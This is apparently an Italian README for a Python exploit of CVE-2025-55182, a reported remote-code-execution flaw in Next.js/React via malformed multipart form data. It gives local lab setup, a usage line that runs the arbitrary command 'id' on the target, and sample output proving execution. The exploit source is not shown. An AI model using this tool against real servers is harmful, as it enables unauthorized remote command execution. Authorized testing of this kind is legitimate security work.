
Exploit Python per CVE-2025-55182, un'iniezione JavaScript lato server in Next.js/React che consente l'esecuzione remota di codice tramite dati di form multipart malformati. Include configurazione del laboratorio per test autorizzati.
Script Python 3 che può essere utilizzato per dimostrare CVE-2025-55182. Sfrutta una vulnerabilità di injection JavaScript lato server nelle applicazioni Next.js/React, consentendo l'esecuzione remota di codice tramite dati di form multipart malformati.
⚠️ Solo per scopi educativi e test autorizzati.
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u Dominio o IP di destinazione con protocollo - http://localhost:3000 -c Comando da eseguire sul server - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)